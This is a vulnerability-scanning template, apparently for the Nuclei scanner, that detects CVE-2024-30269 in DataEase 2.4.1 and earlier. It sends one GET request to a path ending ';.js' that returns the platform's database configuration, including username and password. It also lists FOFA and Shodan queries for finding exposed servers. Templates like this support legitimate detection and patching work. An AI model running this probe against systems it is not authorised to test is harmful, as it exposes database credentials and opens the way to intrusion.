id: CVE-2024-30269 info: name: DataEase <= 2.4.1 - Sensitive Information Exposure author: s4e-io severity: medium description: | DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned. impact: | Attackers can access sensitive configuration and credential information from the DataEase system. remediation: | Update DataEase to version 2.5.0 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-30269 - https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5 - https://github.com/dataease/dataease classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-30269 cwe-id: CWE-200 epss-score: 0.16 epss-percentile: 0.96561 metadata: verified: true max-request: 1 vendor: dataease product: dataease fofa-query: body="dataease" shodan-query: http.html:"dataease" tags: cve,cve2024,dataease,exposure,vkev,vuln http: - method: GET path: - "{{BaseURL}}/de2api/engine/getEngine;.js" matchers: - type: dsl dsl: - 'contains_all(body, "username", "password", "port", "name\":", "pid\":")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and # digest: 4a0a00473045022100b319729b9bcb5b0872febeb3b42045f1f80fc164bdc999bd1a03b8a2e975ed570220378948e0e1f6d36db737b9e7fa82adb478559fad8b8170677d04ebc88801d48e:922c64590222798bb761d5b6d8e72950